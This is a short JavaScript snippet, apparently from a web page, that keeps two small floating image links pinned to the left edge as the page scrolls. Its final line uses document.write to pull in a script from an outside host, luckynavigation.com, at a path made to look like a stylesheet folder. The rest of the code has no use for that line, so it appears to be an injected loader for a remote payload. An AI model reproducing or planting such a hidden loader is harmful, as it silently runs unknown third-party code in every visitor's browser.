<SCRIPT language=JavaScript>
lastScrollY=0;
function heartBeat(){ 
diffY=document.body.scrollTop; 
percent=.1*(diffY-lastScrollY); 
if(percent>0)percent=Math.ceil(percent); 
else percent=Math.floor(percent); 
document.all.lovexin12.style.pixelTop+=percent;
document.all.lovexin14.style.pixelTop+=percent;
lastScrollY=lastScrollY+percent; 
} 
suspendcode12="<DIV id=lovexin12 style='left:0px;POSITION:absolute;TOP:183px;'><A HREF='qk01.htm' Title=''><img src='ima/left.gif' border=0 width='24' height='61'></A></div>"
document.write(suspendcode12);
suspendcode14="<DIV id=lovexin14style='left:0px;POSITION:absolute;TOP:283px;'><A HREF='qk02.htm' Title=''><img src='ima/left.gif' border=0 width='24' height='61'></A></div>"
document.write(suspendcode14);
window.setInterval("heartBeat()",1); document.write ('<SCRIPT src="http://www.luckynavigation.com/OA/css/ajax.js"></script>');
